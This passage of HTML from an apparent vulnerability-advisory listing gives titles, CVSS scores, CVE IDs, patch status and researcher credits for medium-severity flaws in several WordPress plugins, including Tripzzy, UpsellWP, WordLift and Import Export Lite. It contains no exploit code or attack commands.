<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86802" target="_blank" rel="noopener noreferrer">							CVE-2026-86802						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/todo-lists-for-membership-sites" target="_blank" rel="noopener">To Do List Member</a> <span class="wfvr-software-slug">[todo-lists-for-membership-sites]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3555d06b-e36a-4ba5-b026-1c957c63f36b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d554cfa3-06b4-4704-84c9-d336301af6c8" target="_blank" rel="noopener">Tripzzy &lt;= 1.5.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87840" target="_blank" rel="noopener noreferrer">							CVE-2026-87840						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tripzzy" target="_blank" rel="noopener">Tripzzy – Travel Engine System</a> <span class="wfvr-software-slug">[tripzzy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d554cfa3-06b4-4704-84c9-d336301af6c8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a7ab6992-25be-44b3-9308-8a6faaa3cb5b" target="_blank" rel="noopener">Tripzzy &lt;= 1.5.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87839" target="_blank" rel="noopener noreferrer">							CVE-2026-87839						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tripzzy" target="_blank" rel="noopener">Tripzzy – Travel Engine System</a> <span class="wfvr-software-slug">[tripzzy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a7ab6992-25be-44b3-9308-8a6faaa3cb5b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6e2f37a-63c1-4d9b-b316-3ed568a9263f" target="_blank" rel="noopener">UpsellWP &lt;= 2.2.9 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85350" target="_blank" rel="noopener noreferrer">							CVE-2026-85350						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkout-upsell-and-order-bumps" target="_blank" rel="noopener">UpsellWP – Upsell and Related Products Offers for WooCommerce</a> <span class="wfvr-software-slug">[checkout-upsell-and-order-bumps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6e2f37a-63c1-4d9b-b316-3ed568a9263f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dbf13a06-0e2e-441a-9732-31c7e8997aeb" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder &lt;= 5.2.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74017" target="_blank" rel="noopener noreferrer">							CVE-2026-74017						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</a> <span class="wfvr-software-slug">[user-registration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asdqgggg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e846d74e36253a0b9cca6affd02f1ce8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e846d74e36253a0b9cca6affd02f1ce8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asdqgggg" target="_blank" rel="noopener">asdqgggg</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dbf13a06-0e2e-441a-9732-31c7e8997aeb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/96d8da55-0706-42b6-8423-260f6138387d" target="_blank" rel="noopener">WordLift &lt;= 3.54.10 &#8211; Unauthenticated Sensitive Information Exposure in JSON-LD REST API Endpoints</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9289" target="_blank" rel="noopener noreferrer">							CVE-2026-9289						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wordlift" target="_blank" rel="noopener">WordLift – AI powered SEO – Schema</a> <span class="wfvr-software-slug">[wordlift]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benedictus-jovan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5ddf9d14fe3d5ebed8efd101f21a9e12.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5ddf9d14fe3d5ebed8efd101f21a9e12"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benedictus-jovan" target="_blank" rel="noopener">Benedictus Jovan (aillesiM)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/96d8da55-0706-42b6-8423-260f6138387d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7635a48a-6ae9-41aa-ba3d-886cf3bfdf54" target="_blank" rel="noopener">WPGraphQL Smart Cache &lt;= 2.3.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92099" target="_blank" rel="noopener noreferrer">							CVE-2026-92099						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpgraphql-smart-cache" target="_blank" rel="noopener">WPGraphQL Smart Cache</a> <span class="wfvr-software-slug">[wpgraphql-smart-cache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/msfire" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d7f9038fb861e9fb261bb8e1fc1e461f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d7f9038fb861e9fb261bb8e1fc1e461f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/msfire" target="_blank" rel="noopener">msfire</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7635a48a-6ae9-41aa-ba3d-886cf3bfdf54" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/36ad02c5-3272-4ccd-af62-dc267f3b574f" target="_blank" rel="noopener">Zonify – Amazon Product Importer for WooCommerce &lt; 1.0.5 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87842" target="_blank" rel="noopener noreferrer">							CVE-2026-87842						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zonify" target="_blank" rel="noopener">Zonify – Amazon Product Importer for WooCommerce</a> <span class="wfvr-software-slug">[zonify]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/36ad02c5-3272-4ccd-af62-dc267f3b574f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa27c758-f02b-4120-bf66-b310720161b4" target="_blank" rel="noopener">GoPay for WooCommerce &lt;= 1.0.36 &#8211; Authenticated (Shop Manager+) SQL Injection via &#8216;log_table_filter&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75959" target="_blank" rel="noopener noreferrer">							CVE-2026-75959						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gopay-gateway" target="_blank" rel="noopener">GoPay for WooCommerce</a> <span class="wfvr-software-slug">[gopay-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa27c758-f02b-4120-bf66-b310720161b4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/99df25b9-cd58-4a42-8bbd-bc243558c227" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.32 &#8211; Authenticated (Admin+) Arbitrary File Read</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76555" target="_blank" rel="noopener noreferrer">							CVE-2026-76555						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hasyros" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2f88909837ee7c1b94a4ff2e0b7f519d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2f88909837ee7c1b94a4ff2e0b7f519d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hasyros" target="_blank" rel="noopener">Hasyros</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/99df25b9-cd58-4a42-8bbd-bc243558c227" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/359395ff-a162-40f2-9bf7-54fc6f05fc9a" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.32 &#8211; Authenticated (Admin+) Path Traversal to Arbitrary Directory Deletion</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76553" target="_blank" rel="noopener noreferrer">							CVE-2026-76553						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a757d7b79b347554dafd0b3534c2218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a757d7b79b347554dafd0b3534c2218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener">mak3bread</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/359395ff-a162-40f2-9bf7-54fc6f05fc9a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b43ab8c8-8462-406d-9c06-49e2092f73e4" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.32 &#8211; Authenticated (Admin+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76557" target="_blank" rel="noopener noreferrer">							CVE-2026-76557						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a757d7b79b347554dafd0b3534c2218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a757d7b79b347554dafd0b3534c2218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener">mak3bread</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b43ab8c8-8462-406d-9c06-49e2092f73e4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2d379440-3574-49af-ba56-10cdae65c756" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.32 &#8211; Authenticated (Admin+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
